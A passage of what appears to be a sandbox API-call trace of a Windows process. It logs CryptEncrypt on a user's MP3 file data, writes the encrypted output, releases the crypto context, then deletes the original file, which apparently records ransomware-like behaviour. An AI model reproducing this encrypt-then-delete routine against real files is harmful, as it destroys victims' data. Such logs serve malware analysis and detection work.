lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab128, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.186] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x150f9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15100) returned 1 [0208.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.186] CharLowerBuffW (in: lpsz="byte[86272]", cchLength=0xb | out: lpsz="byte[86272]") returned 0xb [0208.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.190] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.190] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.190] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.190] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.190] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.190] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.192] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d5150*, pdwDataLen=0x8cef60*=0x150f9, dwBufLen=0x15100 | out: pbData=0x37d5150*, pdwDataLen=0x8cef60*=0x15100) returned 1 [0208.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.197] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.197] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.197] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.197] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.197] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.198] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.198] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.198] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.198] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.206] WriteFile (in: hFile=0x524, lpBuffer=0x2ac3980*, nNumberOfBytesToWrite=0x15100, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac3980*, lpNumberOfBytesWritten=0x8cf5e4*=0x15100, lpOverlapped=0x0) returned 1 [0208.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.208] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.208] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.208] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.208] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.208] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.208] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.208] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.208] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.208] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.208] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaac30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.209] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0208.209] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.209] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.209] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.209] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.209] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.209] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.209] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.209] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.209] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.209] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.209] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.209] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.209] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.209] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.210] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.210] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.210] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.210] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.210] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.210] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.210] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.211] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0208.211] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.211] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.211] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.211] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.211] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.211] CloseHandle (hObject=0x510) returned 1 [0208.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.214] CloseHandle (hObject=0x524) returned 1 [0208.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.218] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.218] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.218] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.218] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", lpFilePart=0x8cedf4*="pGVUGdUF Vft.mp3") returned 0x26 [0208.218] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pgvugduf vft.mp3")) returned 0x20 [0208.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725cd5e0, ftCreationTime.dwHighDateTime=0x1d5d61d, ftLastAccessTime.dwLowDateTime=0x7a6e0b10, ftLastAccessTime.dwHighDateTime=0x1d5d644, ftLastWriteTime.dwLowDateTime=0x7a6e0b10, ftLastWriteTime.dwHighDateTime=0x1d5d644, nFileSizeHigh=0x0, nFileSizeLow=0x150f9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pGVUGdUF Vft.mp3", cAlternateFileName="PGVUGD~1.MP3")) returned 0x9e2078 [0208.218] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pgvugduf vft.mp3")) returned 1 [0208.221] 